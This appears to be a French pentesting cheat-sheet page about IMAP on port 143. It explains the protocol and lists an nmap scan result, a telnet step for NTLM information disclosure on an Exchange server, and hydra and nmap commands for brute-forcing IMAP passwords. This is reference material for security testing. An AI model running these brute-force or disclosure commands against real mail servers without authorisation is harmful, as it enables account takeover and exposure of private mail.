Bebzounette
Rechercher…
Services
Social Engineering
Sténographie
Failles Système
Failles Réseaux
Failles Applicative
Failles Physique
Forensic
Information gathering
Client Lourd /Thick Client
Active Directory
Github Repos
IMAP - 143
1. Infos
Protocole d'accès aux messages Internet
IMAP vous permet d'accéder à vos mails où que vous soyez ; la plupart du temps, il est accessible via Internet. En principe, les messages électroniques sont stockés sur des serveurs. Chaque fois que vous consultez votre boîte de réception, votre client de messagerie contacte le serveur pour vous mettre en relation avec vos messages. Lorsque vous lisez un message électronique en utilisant IMAP, vous ne le téléchargez pas ou ne le stockez pas sur votre ordinateur, mais vous le lisez à partir du serveur.
Par défaut, le protocole IMAP fonctionne sur deux ports :
- Port 143 - Par défaut, non sécurisé
- Port 993 - Port IMAP sécurisé
1
PORT STATE SERVICE
2
143/tcp open imap
Copied!
2. NTLM Auth - Information disclosure
1
telnet PILOU.com 143
2
* OK The Microsoft Exchange IMAP4 service is ready.
3
>> a1 AUTHENTICATE NTLM
Copied!
3. BruteForce
1
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
2
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
3
nmap -sV --script imap-brute -p <PORT> <IP>
Copied!
Dernière mise à jour 7mo ago
Copier le lien